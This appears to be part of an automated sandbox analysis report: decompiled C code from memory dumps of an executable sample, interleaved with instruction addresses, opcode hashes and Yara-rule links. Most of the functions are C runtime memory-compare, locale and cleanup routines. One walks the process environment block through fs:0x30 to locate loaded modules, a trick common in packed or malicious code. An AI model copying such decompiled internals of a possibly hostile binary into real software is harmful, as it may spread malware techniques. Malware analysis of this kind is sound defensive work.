														_t228 = (0 | _t228 > 0x00000000) * 2 - 1;
													}
													goto L76;
												}
												_t228 = (0 | _t285 > 0x00000000) * 2 - 1;
												if(_t228 != 0) {
													goto L78;
												}
												goto L73;
											}
											_t228 = (0 | _t283 > 0x00000000) * 2 - 1;
											if(_t228 != 0) {
												goto L78;
											}
											goto L71;
										}
										_t228 = (0 | _t281 > 0x00000000) * 2 - 1;
										if(_t228 != 0) {
											goto L78;
										}
										goto L69;
									}
									_t287 = (_t183 & 0x000000ff) - ( *(_t278 - 8) & 0x000000ff);
									if(_t287 == 0) {
										L58:
										_t289 = ( *(_t322 - 7) & 0x000000ff) - ( *(_t278 - 7) & 0x000000ff);
										if(_t289 == 0) {
											L60:
											_t291 = ( *(_t322 - 6) & 0x000000ff) - ( *(_t278 - 6) & 0x000000ff);
											if(_t291 == 0) {
												L62:
												_t228 = ( *(_t322 - 5) & 0x000000ff) - ( *(_t278 - 5) & 0x000000ff);
												if(_t228 != 0) {
													_t228 = (0 | _t228 > 0x00000000) * 2 - 1;
												}
												goto L65;
											}
											_t228 = (0 | _t291 > 0x00000000) * 2 - 1;
											if(_t228 != 0) {
												goto L78;
											}
											goto L62;
										}
										_t228 = (0 | _t289 > 0x00000000) * 2 - 1;
										if(_t228 != 0) {
											goto L78;
										}
										goto L60;
									}
									_t228 = (0 | _t287 > 0x00000000) * 2 - 1;
									if(_t228 != 0) {
										goto L78;
									}
									goto L58;
								}
								_t293 = ( *(_t322 - 0xc) & 0x000000ff) - ( *(_t278 - 0xc) & 0x000000ff);
								if(_t293 == 0) {
									L47:
									_t295 = ( *(_t322 - 0xb) & 0x000000ff) - ( *(_t278 - 0xb) & 0x000000ff);
									if(_t295 == 0) {
										L49:
										_t297 = ( *(_t322 - 0xa) & 0x000000ff) - ( *(_t278 - 0xa) & 0x000000ff);
										if(_t297 == 0) {
											L51:
											_t228 = ( *(_t322 - 9) & 0x000000ff) - ( *(_t278 - 9) & 0x000000ff);
											if(_t228 != 0) {
												_t228 = (0 | _t228 > 0x00000000) * 2 - 1;
											}
											goto L54;
										}
										_t228 = (0 | _t297 > 0x00000000) * 2 - 1;
										if(_t228 != 0) {
											goto L78;
										}
										goto L51;
									}
									_t228 = (0 | _t295 > 0x00000000) * 2 - 1;
									if(_t228 != 0) {
										goto L78;
									}
									goto L49;
								}
								_t228 = (0 | _t293 > 0x00000000) * 2 - 1;
								if(_t228 != 0) {
									goto L78;
								}
								goto L47;
							}
							_t299 = (_t181 & 0x000000ff) - ( *(_t278 - 0x10) & 0x000000ff);
							if(_t299 == 0) {
								L36:
								_t301 = ( *(_t322 - 0xf) & 0x000000ff) - ( *(_t278 - 0xf) & 0x000000ff);
								if(_t301 == 0) {
									L38:
									_t303 = ( *(_t322 - 0xe) & 0x000000ff) - ( *(_t278 - 0xe) & 0x000000ff);
									if(_t303 == 0) {
										L40:
										_t228 = ( *(_t322 - 0xd) & 0x000000ff) - ( *(_t278 - 0xd) & 0x000000ff);
										if(_t228 != 0) {
											_t228 = (0 | _t228 > 0x00000000) * 2 - 1;
										}
										goto L43;
									}
									_t228 = (0 | _t303 > 0x00000000) * 2 - 1;
									if(_t228 != 0) {
										goto L78;
									}
									goto L40;
								}
								_t228 = (0 | _t301 > 0x00000000) * 2 - 1;
								if(_t228 != 0) {
									goto L78;
								}
								goto L38;
							}
							_t228 = (0 | _t299 > 0x00000000) * 2 - 1;
							if(_t228 != 0) {
								goto L78;
							}
							goto L36;
						}
						_t305 = (_t180 & 0x000000ff) - ( *(_t278 - 0x14) & 0x000000ff);
						if(_t305 == 0) {
							L25:
							_t307 = ( *(_t322 - 0x13) & 0x000000ff) - ( *(_t278 - 0x13) & 0x000000ff);
							if(_t307 == 0) {
								L27:
								_t309 = ( *(_t322 - 0x12) & 0x000000ff) - ( *(_t278 - 0x12) & 0x000000ff);
								if(_t309 == 0) {
									L29:
									_t228 = ( *(_t322 - 0x11) & 0x000000ff) - ( *(_t278 - 0x11) & 0x000000ff);
									if(_t228 != 0) {
										_t228 = (0 | _t228 > 0x00000000) * 2 - 1;
									}
									goto L32;
								}
								_t228 = (0 | _t309 > 0x00000000) * 2 - 1;
								if(_t228 != 0) {
									goto L78;
								}
								goto L29;
							}
							_t228 = (0 | _t307 > 0x00000000) * 2 - 1;
							if(_t228 != 0) {
								goto L78;
							}
							goto L27;
						}
						_t228 = (0 | _t305 > 0x00000000) * 2 - 1;
						if(_t228 != 0) {
							goto L78;
						}
						goto L25;
					}
					_t311 = (_t179 & 0x000000ff) - ( *(_t278 - 0x18) & 0x000000ff);
					if(_t311 == 0) {
						L14:
						_t313 = ( *(_t322 - 0x17) & 0x000000ff) - ( *(_t278 - 0x17) & 0x000000ff);
						if(_t313 == 0) {
							L16:
							_t315 = ( *(_t322 - 0x16) & 0x000000ff) - ( *(_t278 - 0x16) & 0x000000ff);
							if(_t315 == 0) {
								L18:
								_t228 = ( *(_t322 - 0x15) & 0x000000ff) - ( *(_t278 - 0x15) & 0x000000ff);
								if(_t228 != 0) {
									_t228 = (0 | _t228 > 0x00000000) * 2 - 1;
								}
								goto L21;
							}
							_t228 = (0 | _t315 > 0x00000000) * 2 - 1;
							if(_t228 != 0) {
								goto L78;
							}
							goto L18;
						}
						_t228 = (0 | _t313 > 0x00000000) * 2 - 1;
						if(_t228 != 0) {
							goto L78;
						}
						goto L16;
					}
					_t228 = (0 | _t311 > 0x00000000) * 2 - 1;
					if(_t228 != 0) {
						goto L78;
					}
					goto L14;
				}
				_t317 = (_t177 & 0x000000ff) - ( *(__edx - 0x1c) & 0x000000ff);
				if(_t317 == 0) {
					L3:
					_t319 = ( *(_t322 - 0x1b) & 0x000000ff) - ( *(_t278 - 0x1b) & 0x000000ff);
					if(_t319 == 0) {
						L5:
						_t321 = ( *(_t322 - 0x1a) & 0x000000ff) - ( *(_t278 - 0x1a) & 0x000000ff);
						if(_t321 == 0) {
							L7:
							_t228 = ( *(_t322 - 0x19) & 0x000000ff) - ( *(_t278 - 0x19) & 0x000000ff);
							if(_t228 != 0) {
								_t228 = (0 | _t228 > 0x00000000) * 2 - 1;
							}
							goto L10;
						}
						_t228 = (0 | _t321 > 0x00000000) * 2 - 1;
						if(_t228 != 0) {
							goto L78;
						}
						goto L7;
					}
					_t228 = (0 | _t319 > 0x00000000) * 2 - 1;
					if(_t228 != 0) {
						goto L78;
					}
					goto L5;
				}
				_t228 = (0 | _t317 > 0x00000000) * 2 - 1;
				if(_t228 != 0) {
					goto L78;
				}
				goto L3;
			}


































                                                        0x00a64fc3
                                                        0x00a64fc3
                                                        0x00a64fc3
                                                        0x00a64fc9
                                                        0x00a65050
                                                        0x00a65052
                                                        0x00a65054
                                                        0x00a653d3
                                                        0x00a653d3
                                                        0x00a661c3
                                                        0x00a661c3
                                                        0x00a6505a
                                                        0x00a65060
                                                        0x00a650e7
                                                        0x00a650e9
                                                        0x00a650eb
                                                        0x00000000
                                                        0x00000000
                                                        0x00a650f1
                                                        0x00a650f7
                                                        0x00a6517e
                                                        0x00a65180
                                                        0x00a65182
                                                        0x00000000
                                                        0x00000000
                                                        0x00a65188
                                                        0x00a6518e
                                                        0x00a65215
                                                        0x00a65217
                                                        0x00a65219
                                                        0x00000000
                                                        0x00000000
                                                        0x00a65225
                                                        0x00a652ad
                                                        0x00a652af
                                                        0x00a652b1
                                                        0x00000000
                                                        0x00000000
                                                        0x00a652b7
                                                        0x00a652bd
                                                        0x00a65344
                                                        0x00a65346
                                                        0x00a65348
                                                        0x00000000
                                                        0x00000000
                                                        0x00a6534e
                                                        0x00a65354
                                                        0x00a653cb
                                                        0x00a653cd
                                                        0x00a653cf
                                                        0x00a653d1
                                                        0x00a653d1
                                                        0x00000000
                                                        0x00a653cf
                                                        0x00a6535d
                                                        0x00a6535f
                                                        0x00a65373
                                                        0x00a6537b
                                                        0x00a6537d
                                                        0x00a65391
                                                        0x00a65399
                                                        0x00a6539b
                                                        0x00a653af
                                                        0x00a653b7
                                                        0x00a653b9
                                                        0x00a653c2
                                                        0x00a653c2
                                                        0x00000000
                                                        0x00a653b9
                                                        0x00a653a4
                                                        0x00a653ad
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00a653ad
                                                        0x00a65386
                                                        0x00a6538f
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00a6538f
                                                        0x00a65368
                                                        0x00a65371
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00a65371
                                                        0x00a652ca
                                                        0x00a652cc
                                                        0x00a652e4
                                                        0x00a652ec
                                                        0x00a652ee
                                                        0x00a65306
                                                        0x00a6530e
                                                        0x00a65310
                                                        0x00a65328
                                                        0x00a65330
                                                        0x00a65332
                                                        0x00a6533b
                                                        0x00a6533b
                                                        0x00000000
                                                        0x00a65332
                                                        0x00a65319
                                                        0x00a65322
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00a65322
                                                        0x00a652f7
                                                        0x00a65300
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00a65300
                                                        0x00a652d5
                                                        0x00a652de
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00a652de
                                                        0x00a65233
                                                        0x00a65235
                                                        0x00a6524d
                                                        0x00a65255
                                                        0x00a65257
                                                        0x00a6526f
                                                        0x00a65277
                                                        0x00a65279
                                                        0x00a65291
                                                        0x00a65299
                                                        0x00a6529b
                                                        0x00a652a4
                                                        0x00a652a4
                                                        0x00000000
                                                        0x00a6529b
                                                        0x00a65282
                                                        0x00a6528b
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00a6528b
                                                        0x00a65260
                                                        0x00a65269
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00a65269
                                                        0x00a6523e
                                                        0x00a65247
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00a65247
                                                        0x00a6519b
                                                        0x00a6519d
                                                        0x00a651b5
                                                        0x00a651bd
                                                        0x00a651bf
                                                        0x00a651d7
                                                        0x00a651df
                                                        0x00a651e1
                                                        0x00a651f9
                                                        0x00a65201
                                                        0x00a65203
                                                        0x00a6520c
                                                        0x00a6520c
                                                        0x00000000
                                                        0x00a65203
                                                        0x00a651ea
                                                        0x00a651f3
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00a651f3
                                                        0x00a651c8
                                                        0x00a651d1
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00a651d1
                                                        0x00a651a6
                                                        0x00a651af
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00a651af
                                                        0x00a65104
                                                        0x00a65106
                                                        0x00a6511e
                                                        0x00a65126
                                                        0x00a65128
                                                        0x00a65140
                                                        0x00a65148
                                                        0x00a6514a
                                                        0x00a65162
                                                        0x00a6516a
                                                        0x00a6516c
                                                        0x00a65175
                                                        0x00a65175
                                                        0x00000000
                                                        0x00a6516c
                                                        0x00a65153
                                                        0x00a6515c
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00a6515c
                                                        0x00a65131
                                                        0x00a6513a
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00a6513a
                                                        0x00a6510f
                                                        0x00a65118
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00a65118
                                                        0x00a6506d
                                                        0x00a6506f
                                                        0x00a65087
                                                        0x00a6508f
                                                        0x00a65091
                                                        0x00a650a9
                                                        0x00a650b1
                                                        0x00a650b3
                                                        0x00a650cb
                                                        0x00a650d3
                                                        0x00a650d5
                                                        0x00a650de
                                                        0x00a650de
                                                        0x00000000
                                                        0x00a650d5
                                                        0x00a650bc
                                                        0x00a650c5
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00a650c5
                                                        0x00a6509a
                                                        0x00a650a3
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00a650a3
                                                        0x00a65078
                                                        0x00a65081
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00a65081
                                                        0x00a64fd6
                                                        0x00a64fd8
                                                        0x00a64ff0
                                                        0x00a64ff8
                                                        0x00a64ffa
                                                        0x00a65012
                                                        0x00a6501a
                                                        0x00a6501c
                                                        0x00a65034
                                                        0x00a6503c
                                                        0x00a6503e
                                                        0x00a65047
                                                        0x00a65047
                                                        0x00000000
                                                        0x00a6503e
                                                        0x00a65025
                                                        0x00a6502e
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00a6502e
                                                        0x00a65003
                                                        0x00a6500c
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00a6500c
                                                        0x00a64fe1
                                                        0x00a64fea
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000

                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.656525096.0000000000A51000.00000020.00020000.sdmp, Offset: 00A50000, based on PE: true
                                                        • Associated: 00000001.00000002.656517566.0000000000A50000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.656546159.0000000000A6A000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.656553288.0000000000A6F000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.656571370.0000000000A72000.00000002.00020000.sdmp Download File
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                        • Instruction ID: 880fdb418a7510cd45a205f05d36c94039a3f1baa926c68c3c43ca3d4b20f09b
                                                        • Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                        • Instruction Fuzzy Hash: E8C17332A095930ADF2D4739C47413FBAB15AA2BB171A176DD4F3CF1C5EEA0C924DA60
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 008FF334, Relevance: .0, Instructions: 26COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.656320759.00000000008FD000.00000040.00000001.sdmp, Offset: 008FD000, based on PE: false
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 34204ef2a819d517e29e79ac75304308f8f45a9935b90984d5a389d031013f12
                                                        • Instruction ID: da8069b20a5916e6fe99f77cef575ad6529a76a3fbadb0def325006f1f48c2c1
                                                        • Opcode Fuzzy Hash: 34204ef2a819d517e29e79ac75304308f8f45a9935b90984d5a389d031013f12
                                                        • Instruction Fuzzy Hash: ABE01A36264908AFCB44CBB8CD81D65B3E8FF19720B1442A0FE25C73A2E634EE009A51
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 008FF371, Relevance: .0, Instructions: 23COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.656320759.00000000008FD000.00000040.00000001.sdmp, Offset: 008FD000, based on PE: false
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: ff5f89fbc0ecb4e9f42a23ab0e6ea761649b2aca3cc7db53e6fbbfb3471062a8
                                                        • Instruction ID: e70e97002fec6eeb7f8e7716f4c4158dbe541a925660b5d381c616a373ed9ef0
                                                        • Opcode Fuzzy Hash: ff5f89fbc0ecb4e9f42a23ab0e6ea761649b2aca3cc7db53e6fbbfb3471062a8
                                                        • Instruction Fuzzy Hash: D2E04F372205189BC7319A6AC844CA7F7E9FF987B0B154835EB89D7712D230FC00CA90
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00A51E50, Relevance: .0, Instructions: 10COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 100%
                                                        			E00A51E50() {

				return  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)))))) + 0x18));
			}



                                                        0x00a51e67

                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.656525096.0000000000A51000.00000020.00020000.sdmp, Offset: 00A50000, based on PE: true
                                                        • Associated: 00000001.00000002.656517566.0000000000A50000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.656546159.0000000000A6A000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.656553288.0000000000A6F000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.656571370.0000000000A72000.00000002.00020000.sdmp Download File
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: f9ed70d17b65b173f63ea8bde167bd4dbe7c19cd1b27e585218ed96e6e4df4c6
                                                        • Instruction ID: 58c6f5837427d6eca2c2deaad74ce6c6656098581891570576efec04afcca601
                                                        • Opcode Fuzzy Hash: f9ed70d17b65b173f63ea8bde167bd4dbe7c19cd1b27e585218ed96e6e4df4c6
                                                        • Instruction Fuzzy Hash: 42D001392A1A48CFC241CF4CD084E40B3F8FB0DA20B068092FA0A8BB32C334FC00DA80
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 008FEAC5, Relevance: .0, Instructions: 7COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.656320759.00000000008FD000.00000040.00000001.sdmp, Offset: 008FD000, based on PE: false
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 7398b6239bf8858e3d1776f2ebb5b6e80944bbaad592eaf912553e7d93e1029a
                                                        • Instruction ID: 347fb49152d9dd59aae9cec094fa757b2660c5a88f064852b0114fd7b76a6a81
                                                        • Opcode Fuzzy Hash: 7398b6239bf8858e3d1776f2ebb5b6e80944bbaad592eaf912553e7d93e1029a
                                                        • Instruction Fuzzy Hash: 66B092606154C44AEB2283348415B1176E0FB50B02F8984E0A045C2891C25C8984D200
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 008FF3D4, Relevance: .0, Instructions: 7COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.656320759.00000000008FD000.00000040.00000001.sdmp, Offset: 008FD000, based on PE: false
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 7c05f99247aa81ce170190a3f42a6638173cba83a8e8f878aed30f5516b3ecb7
                                                        • Instruction ID: 01513cdb45ce42654985ae443ff07ed2023d2f9c2cc80418f216d1c85a703bac
                                                        • Opcode Fuzzy Hash: 7c05f99247aa81ce170190a3f42a6638173cba83a8e8f878aed30f5516b3ecb7
                                                        • Instruction Fuzzy Hash: ECC00139661A40CFCA55CF08C194E00B3F4FB5D760B068491E906CB732C234ED40DA40
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 008FF519, Relevance: .0, Instructions: 3COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.656320759.00000000008FD000.00000040.00000001.sdmp, Offset: 008FD000, based on PE: false
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 3f377ddc5f06dfc3153ea0c28b0a1464ef23ffe7e410e0425465c082cb6f6e04
                                                        • Instruction ID: cb197d2559c09660318d3d12e6cb9f80cf1b08a2d0c32daa4285e7c7a95ab15a
                                                        • Opcode Fuzzy Hash: 3f377ddc5f06dfc3153ea0c28b0a1464ef23ffe7e410e0425465c082cb6f6e04
                                                        • Instruction Fuzzy Hash: ECA00179152A809BD7128B55D558B9476A4B748A44F9544A4D40546A51827C5504CE04
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00A628EA, Relevance: 24.1, APIs: 16, Instructions: 92COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 100%
                                                        			E00A628EA(void* __ebx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t12;
				intOrPtr _t13;
				intOrPtr _t17;
				intOrPtr* _t45;

				if(_a4 > 5 || _a8 == 0) {
					L4:
					return 0;
				} else {
					_t45 = E00A54E6A(8, 1);
					_t52 = _t45;
					if(_t45 != 0) {
						_t12 = E00A54E6A(0xb8, 1);
						 *_t45 = _t12;
						__eflags = _t12;
						if(_t12 != 0) {
							_t13 = E00A54E6A(0x220, 1);
							 *((intOrPtr*)(_t45 + 4)) = _t13;
							__eflags = _t13;
							if(_t13 != 0) {
								E00A62412( *_t45, 0xa6fe20);
								__eflags = E00A62D0A(__ebx, __edx, 1, _t45,  *_t45, _a4, _a8);
								if(__eflags != 0) {
									_t17 = E00A5B4CB(__edx, 1, __eflags,  *((intOrPtr*)( *_t45 + 4)),  *((intOrPtr*)(_t45 + 4)));
									__eflags = _t17;
									if(_t17 == 0) {
										 *((intOrPtr*)( *((intOrPtr*)(_t45 + 4)))) = 1;
										L17:
										return _t45;
									}
									E00A54E32( *((intOrPtr*)(_t45 + 4)));
									E00A5E1AE( *_t45);
									E00A5E054( *_t45);
									E00A54E32(_t45);
									L15:
									_t45 = 0;
									goto L17;
								}
								E00A5E1AE( *_t45);
								E00A5E054( *_t45);
								E00A54E32(_t45);
								goto L15;
							}
							E00A54E32( *_t45);
							E00A54E32(_t45);
							L8:
							goto L3;
						}
						E00A54E32(_t45);
						goto L8;
					}
					L3:
					 *((intOrPtr*)(E00A553A7(_t52))) = 0xc;
					goto L4;
				}
			}










                                                        0x00a628f3
                                                        0x00a62919
                                                        0x00000000
                                                        0x00a628fb
                                                        0x00a62906
                                                        0x00a6290a
                                                        0x00a6290c
                                                        0x00a62925
                                                        0x00a6292c
                                                        0x00a6292e
                                                        0x00a62930
                                                        0x00a62941
                                                        0x00a62948
                                                        0x00a6294b
                                                        0x00a6294d
                                                        0x00a62966
                                                        0x00a6297b
                                                        0x00a6297d
                                                        0x00a629a0
                                                        0x00a629a7
                                                        0x00a629a9
                                                        0x00a629d1
                                                        0x00a629d3
                                                        0x00000000
                                                        0x00a629d3
                                                        0x00a629ae
                                                        0x00a629b5
                                                        0x00a629bc
                                                        0x00a629c2
                                                        0x00a629ca
                                                        0x00a629ca
                                                        0x00000000
                                                        0x00a629ca
                                                        0x00a62981
                                                        0x00a62988
                                                        0x00a6298e
                                                        0x00000000
                                                        0x00a62993
                                                        0x00a62951
                                                        0x00a62957
                                                        0x00a62938
                                                        0x00000000
                                                        0x00a62938
                                                        0x00a62933
                                                        0x00000000
                                                        0x00a62933
                                                        0x00a6290e
                                                        0x00a62913
                                                        0x00000000
                                                        0x00a62913

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.656525096.0000000000A51000.00000020.00020000.sdmp, Offset: 00A50000, based on PE: true
                                                        • Associated: 00000001.00000002.656517566.0000000000A50000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.656546159.0000000000A6A000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.656553288.0000000000A6F000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.656571370.0000000000A72000.00000002.00020000.sdmp Download File
                                                        Similarity
                                                        • API ID: _free$__calloc_crt$___freetlocinfo___removelocaleref$Sleep__calloc_impl__copytlocinfo_nolock__setmbcp_nolock__wsetlocale_nolock
                                                        • String ID:
                                                        • API String ID: 2661855409-0
                                                        • Opcode ID: 59c70b9b7bd2507471e40938acae94147f2ba9d2c0934babbbd50ce9a93851b3
                                                        • Instruction ID: d4126fe3707c84845e7ab8e75bc080fc769de934d9bed3457ed37827482c4cbe
                                                        • Opcode Fuzzy Hash: 59c70b9b7bd2507471e40938acae94147f2ba9d2c0934babbbd50ce9a93851b3
                                                        • Instruction Fuzzy Hash: 78214B32144A00EAF7267F25EE03B8B7BF1FF95756F208429FD8455062EF3288549B50
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00A53BE9, Relevance: 19.6, APIs: 13, Instructions: 81COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 78%
                                                        			E00A53BE9(void* __eax, void* __ebx) {
				intOrPtr _t5;
				intOrPtr _t6;
				intOrPtr _t7;
				LONG* _t8;
				void* _t9;
				void* _t14;
				void* _t24;
				intOrPtr* _t25;
				intOrPtr* _t26;

				_t14 = __ebx;
				__imp__DecodePointer( *0xa70d34);
				_t25 =  *0xa702b8; // 0x0
				_t24 = __eax;
				if(_t25 != 0) {
					while( *_t25 != 0) {
						E00A54E32( *_t25);
						_t25 = _t25 + 4;
						if(_t25 != 0) {
							continue;
						}
						break;
					}
					_t25 =  *0xa702b8; // 0x0
				}
				_push(_t14);
				E00A54E32(_t25);
				_t26 =  *0xa702b4; // 0xb3ff60
				 *0xa702b8 = 0;
				if(_t26 != 0) {
					while( *_t26 != 0) {
						E00A54E32( *_t26);
						_t26 = _t26 + 4;
						if(_t26 != 0) {
							continue;
						}
						break;
					}
					_t26 =  *0xa702b4; // 0xb3ff60
				}
				E00A54E32(_t26);
				 *0xa702b4 = 0;
				E00A54E32( *0xa702b0);
				_t5 = E00A54E32( *0xa702ac);
				 *0xa702b0 = 0;
				 *0xa702ac = 0;
				if(_t24 != 0xffffffff) {
					_t5 = E00A54E32(_t24);
				}
				__imp__EncodePointer(0);
				 *0xa70d34 = _t5;
				_t6 =  *0xa7043c; // 0x0
				if(_t6 != 0) {
					E00A54E32(_t6);
					 *0xa7043c = 0;
				}
				_t7 =  *0xa70440; // 0x0
				if(_t7 != 0) {
					E00A54E32(_t7);
					 *0xa70440 = 0;
				}
				_t8 = InterlockedDecrement( *0xa6f76c);
				if(_t8 == 0) {
					_t8 =  *0xa6f76c; // 0xb424d8
					if(_t8 != 0xa6fa68) {
						_t9 = E00A54E32(_t8);
						 *0xa6f76c = 0xa6fa68;
						return _t9;
					}
				}
				return _t8;
			}












                                                        0x00a53be9
                                                        0x00a53bf1
                                                        0x00a53bf7
                                                        0x00a53bfd
                                                        0x00a53c01
                                                        0x00a53c03
                                                        0x00a53c0a
                                                        0x00a53c10
                                                        0x00a53c13
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00a53c13
                                                        0x00a53c15
                                                        0x00a53c15
                                                        0x00a53c1b
                                                        0x00a53c1d
                                                        0x00a53c22
                                                        0x00a53c2b
                                                        0x00a53c33
                                                        0x00a53c35
                                                        0x00a53c3b
                                                        0x00a53c41
                                                        0x00a53c44
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00a53c44
                                                        0x00a53c46
                                                        0x00a53c46
                                                        0x00a53c4d
                                                        0x00a53c58
                                                        0x00a53c5e
                                                        0x00a53c69
                                                        0x00a53c71
                                                        0x00a53c77
                                                        0x00a53c80
                                                        0x00a53c83
                                                        0x00a53c88
                                                        0x00a53c8a
                                                        0x00a53c90
                                                        0x00a53c95
                                                        0x00a53c9c
                                                        0x00a53c9f
                                                        0x00a53ca5
                                                        0x00a53ca5
                                                        0x00a53cab
                                                        0x00a53cb2
                                                        0x00a53cb5
                                                        0x00a53cbb
                                                        0x00a53cbb
                                                        0x00a53cc7
                                                        0x00a53cd0
                                                        0x00a53cd2
                                                        0x00a53cde
                                                        0x00a53ce1
                                                        0x00a53ce7
                                                        0x00000000
                                                        0x00a53ce7
                                                        0x00a53cde
                                                        0x00a53cef

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.656525096.0000000000A51000.00000020.00020000.sdmp, Offset: 00A50000, based on PE: true
                                                        • Associated: 00000001.00000002.656517566.0000000000A50000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.656546159.0000000000A6A000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.656553288.0000000000A6F000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.656571370.0000000000A72000.00000002.00020000.sdmp Download File
                                                        Similarity
                                                        • API ID: _free$Pointer$DecodeDecrementEncodeErrorFreeHeapInterlockedLast
                                                        • String ID:
                                                        • API String ID: 4264854383-0
                                                        • Opcode ID: b233e7fa9621279362c55950d2cc6cf8f5653d608c4ef6600a08fa399fe02047
                                                        • Instruction ID: cbc741c623b8f9a8d4c26821454fac907f74586cc02498e60c4a75aa208dcdb3
                                                        • Opcode Fuzzy Hash: b233e7fa9621279362c55950d2cc6cf8f5653d608c4ef6600a08fa399fe02047
                                                        • Instruction Fuzzy Hash: DC218373801310DFCB26DF94FD898867764BB483663148029EE88A3271DB756CCACF80
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00A562B0, Relevance: 16.7, APIs: 11, Instructions: 229COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 87%
                                                        			E00A562B0(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t81;
				void* _t86;
				long _t90;
				signed int _t94;
				signed int _t98;
				signed int _t99;
				signed char _t103;
				signed int _t105;
				intOrPtr _t106;
				intOrPtr* _t109;
				signed char _t111;
				long _t119;
				signed int _t130;
				signed int _t134;
				signed int _t135;
				signed int _t138;
				void** _t140;
				signed int _t142;
				void* _t143;
				signed int _t144;
				void** _t148;
				signed int _t150;
				void* _t151;
				signed int _t155;
				void* _t156;
				void* _t161;

				_push(0x64);
				_push(0xa6d008);
				E00A554B0(__ebx, __edi, __esi);
				E00A54C99(__edx, 0xb);
				_t130 = 0;
				 *(_t156 - 4) = 0;
				_t161 =  *0xa70c20 - _t130; // 0x0
				if(_t161 == 0) {
					_push(0x40);
					_t142 = 0x20;
					_push(_t142);
					_t81 = E00A54E6A();
					_t134 = _t81;
					 *(_t156 - 0x24) = _t134;
					__eflags = _t134;
					if(_t134 != 0) {
						 *0xa70c20 = _t81;
